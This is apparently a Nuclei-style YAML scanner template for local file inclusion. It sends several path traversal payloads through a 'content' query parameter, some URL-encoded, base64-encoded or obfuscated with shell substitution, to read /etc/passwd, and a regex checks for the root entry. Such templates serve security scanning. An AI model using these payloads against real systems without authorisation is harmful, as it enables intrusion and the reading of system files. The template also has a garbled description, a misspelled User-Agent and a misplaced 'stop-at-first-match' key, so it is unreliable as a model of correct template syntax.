id: param-lfi5-content

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     contentectory traversal via the GET /.. substring.

  tags: param-lfi5-content

requests:
  - method: GET
    path:
      - "{{BaseURL}}?content=TGk0dkxpNHZMaTR2TGk0dlpYUmpMM0JoYzNOM1pBPT0="
      - "{{BaseURL}}?content=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd?"
      - "{{BaseURL}}?content=///%2F%2F%2Fet$()c/pa$()sswd?"
      - "{{BaseURL}}?content=//////../../../../etc/passwd"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

